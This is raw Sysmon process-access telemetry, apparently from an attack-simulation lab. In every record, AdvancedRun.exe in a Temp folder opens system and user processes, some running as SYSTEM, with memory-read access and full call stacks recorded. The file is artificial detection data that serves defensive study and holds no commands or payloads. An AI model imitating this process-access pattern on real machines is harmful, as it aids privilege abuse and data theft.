10341000x80000000000000004016251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
